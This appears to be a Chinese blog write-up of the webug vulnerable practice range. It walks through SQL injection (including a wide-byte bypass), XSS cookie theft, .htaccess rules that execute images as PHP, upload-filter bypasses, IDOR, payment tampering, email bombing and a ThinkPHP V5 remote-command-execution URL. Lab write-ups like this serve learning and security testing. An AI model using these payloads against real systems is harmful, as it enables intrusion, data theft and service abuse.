去年写的,写完就忘记了。第二关到第五关记得当时嫌麻烦没搞。。凑合看吧
推下导航页面,
第一关 显错注入
打开页面,猜测URL是注入点,单引号测试,成功报错。
查询字段长度
1'order by 2--+ 回显正常
1'order by 3--+ 报错
字段长度为2
查询数据库名,可以看到,只有第二个字段有输出。
如此使用group_concat()进行查询。
1'union select 1,group_concat(table_name) from information_schema.tables where table_schema='webug'--+
?id=1' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'--+
读取flag
?id=1' union select 1,flag from flag--
第六关宽字节注入
?id=1%df%27%20union%20select%201,group_concat(0x7e,user(),0x7e,database())--+
这里爆出来的数据库不对。。应该是webug ,不愧是webug,bug真不少。
因为是宽字节注入,单引号被过滤了,所以使用16进制绕过
?id=1%df%27%20and%201=2%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x7765627567--+
获得env_list的列,然后获得flag即可
?id=1%df%27%20and%201=2%20union%20select%201,envFlag%20from%20webug.env_list%20limit%2051--+
本来只需要select flag from flag 即可。但是一直报错,语句没有问题。。
第七关 XXE注入
这题打开是个登录页面,直接抓包,然后说是xxe,但是没有xxe的特点。
尝试构造xxe,window下文件读取,
因为本题没有flag,,所以在本地创建了一个flag文件。
然后通过url加密,发包,成功读取到文件。
第九关反射性XSS
打开之后,网页其他链接都打不开,也没有留言页面之类的可插入的地方,只有一个id=1的URL , 对这个url尝试注入,不过不是个注入点。
做完之后经过百度发现还可以直接获取cookie,使用 "document.cookie"
效果如下
第十关 存储型XSS
打开页面,看到最下面有个留言界面。
就直接尝试弹窗代码,<script>alert(1)</script>
获取cookie
第十一关万能密码
万能密码的本质就是sql注入恒等于。
构造 账号 admin
密码 '
登录成功
第十三关 过滤XSS
打开页面,反射xss的页面,尝试构造xss,结果弹窗警告、
尝试大写绕过,失败
发现被过滤script
使用标签绕过,
第十四关链接注入
第一次听说这个,简单概括,
是因为未对用户输入的危险字符进行一个正确的清理,。
连接注入是一种修改站点内容的行为。方式就是将恶意链接嵌入被攻击的网站内,然后诱导他人点击。
防御方式就是过滤字符串。
本题就是在url中嵌套url跳转链接,如下
当我点击靶场的时候,将会自动跳转到192.168.80.84
第十五关任意文件下载
打开 页面,
获取下载链接
分析链接
尝试下载其他文件,比如网站根目录下的 flag.txt,成功
下载系统敏感文件
下载网站源码
第十六关mysql配置文件下载
和上面一关差不多,只不过这个是要求下载mysql的配置文件。
第十七关文件上传(前端拦截)
PHP内容,图片后缀。使用burp抓包,修改后缀为php,然后发包
成功执行
第十八关文件上传解析漏洞
首先绕过前端js,再通过特殊字符进行绕过
第十九关文件上传(畸形文件)
绕过前端js,上传一个php文件看下回显
发现后缀被去掉了,尝试大小写绕过,失败。
尝试双写绕过,成功
第二十关文件上传(截断上传)
一开始陷入误区,看到截断就想到00,后来才想到利用window的特性,文件名不能存在\ :/类似的字符,于是上传paylaod如下
然后浏览器打开info.php
第二十一关文件上传(htaccess)
apache解析漏洞环境要求
php5.6以下且不带nts的版本,
允许上传.htaccess文件,
常见的有两种写法:
第一种,如果文件名为shell.gif将会被解析为php
| <FilesMatch "shell.gif">SetHandler application/x-httpd-php AddHandler php5-script .gif </FilesMatch> |
第二种,当前目录下的所有后缀为.gif的文件都会被当作php执行
| AddType application/x-httpd-php .jpg |
我这里上传的时第二种,
这里webug的环境有问题,需要自己修改源码,不修改的话正常的图片也无法下载。
然后在上传一张jpg的图片马即可。
第二十二关 越权修改密码
两个账号,admin/admin root/root
使用 admin/admin登录 ,然后修改密码,并抓包
id改为2 然后发包,然后重新登录root账号,发现密码被修改为123456789
第二十三关 支付漏洞
打开页面,随便选择一个商品点击购买。看到url的参数,随手进行更改。比如-100.
可以看到。一分钱没花,还赚了100.发家致富只在一瞬间。。
第二十四关 邮箱轰炸
注册个邮箱,然后抓包,,就开始进行批量发包,轰炸,
轰炸,ddos说白了就是批量请求。
burpsuite payload设置如下,即可无限批量法发包,进行ddos。
第二十五关 越权查看admin
使用root账号登录
一眼就看出来了,修改下id,果然直接显示admin
第二十六关URL跳转
打开网站,看到百度的标签,点击并抓包,,
看到URL请求
修改url然后进行发包,但是并未跳转,,点击标红按钮进行重定向。
成功跳转
第二十七关文件包含漏洞
打开首先看到url在目录遍历。。
想起来之前在C盘根目录下还创建了一个flag.txt,直接尝试读取、成功
利用此漏洞进行读取网页源代码。读取成功。
第二十八关命令执行
打开页面,熟悉的ThinkPHP V5
手工利用
http://192.168.58.144/control/more/tp5/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
查找flag文件
330
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
